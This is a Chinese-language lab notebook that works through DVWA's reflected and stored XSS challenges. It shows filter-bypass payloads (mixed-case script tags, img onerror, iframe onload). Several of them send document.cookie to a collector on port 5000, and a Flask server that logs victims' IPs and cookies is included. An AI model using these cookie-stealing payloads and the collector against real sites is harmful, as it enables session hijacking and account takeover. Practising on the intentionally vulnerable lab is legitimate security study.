链接: https://github.com/dhgdhg/DVWA-Note
XSS(Reflected)
chrome 浏览器需要先
chrome.exe -disable-xss-auditor
low
<script>alert(document.cookie)</script>
所以可以偷饼干啦, 哈哈哈, 冲啊
JS
<script>img=new Image();img.src="http://127.0.0.1:5000/?cookie="+document.cookie</script>
服务端
代码
#a.py from flask import Flask, request app = Flask(__name__) @app.route('/') def get_cookie(): cookie = request.args.get("cookie") ip = request.remote_addr with open('ip-cookie.txt', 'ab+') as f: f.write('{} {}\n'.format(ip, cookie).encode('utf8')) return ''
运行
env FLASK_APP=a.py flask run
舒服
medium
<script>alert(document.cookie)</script>
- 返回Hello alert(document.cookie), 黑人蒙蔽, 我script去哪了
- 试试大小写
<ScRipt>alert(document.cookie)</ScRipt>
- 请您收下我的中指, 哈哈哈哈
<ScRipt>img=new Image();img.src="http://127.0.0.1:5000/?cookie="+document.cookie</ScRipt>
- 偷饼干ing....
high
<script>alert(document.cookie)</script>
Hello >, 返回这个可还行
试试大小写
<ScRipt>alert(document.cookie)</ScRipt>
, emm, 可还行再试试这个
script
, Hello script<script
, Hello ,可还行那我不用script了, 很烦
<img src=x onerror=alert(1)>
,<iframe onload=alert(1)>
Beng!<img src=x onerror=windows.open("http://127.0.0.1:5000/?cookie="+document.cookie)>
Beng!供上精品payload
<img src=x onerror=src='http://127.0.0.1:5000/?cookie='+document.cookie>
服务端代码
from flask import Flask, request from flask_limiter import Limiter from flask_limiter.util import get_remote_address app = Flask(__name__) limiter = Limiter( app, key_func=get_remote_address, default_limits=["1 per hour"] ) @app.route('/') def get_cookie(): cookie = request.args.get("cookie") ip = request.remote_addr with open('ip-cookie.txt', 'ab+') as f: f.write('{} {}\n'.format(ip, cookie).encode('utf8')) return ''
XSS(Stored)
- low
- name :
1
- message:
<script>alert(1)</script>
- name :
- medium
- name :
1
- message:
<script>alert(1)</script>
- 凉凉
- name :
1
- message:
<ScRipt>alert(1)</SCrIpt>
- 凉凉
- name :
1
- message:
<ScscriptRipt>alert(1)</SCrscriptIpt>
- 凉凉
- name:
1
- message:
<img src=1 onerror=alert(1)>
- 凉凉
- name:
<scRipt>
- message:
1
- 嗯哼
- name最大字符串长度为10, emm
- name:
<scRipt>/*
- messgae:
1
- name:
2
- messgae:
*/alert(1);/*
- 凉凉
- 用burpsuit抓虾堡, 改改长度, 看看他是不是只是在前端进行长度限制
- 舒服了
- burpsuit
- name:
<scRipt>alert(1)</scRipt>
- messge:
<scRipt>alert(2)</scRipt>
- messge 对script标签过滤了, 不过name没过滤, 老铁, ODK
- name:
- burpsuit
- name :
- high
- burpsuit
- name:
<scRipt>alert(5)</scRipt>
- messge:
6
- 凉
- name:
<img src=x onerror=alert(6)>
,<iframe onload=alert(7)>
- duang
- name:
- burpsuit
- low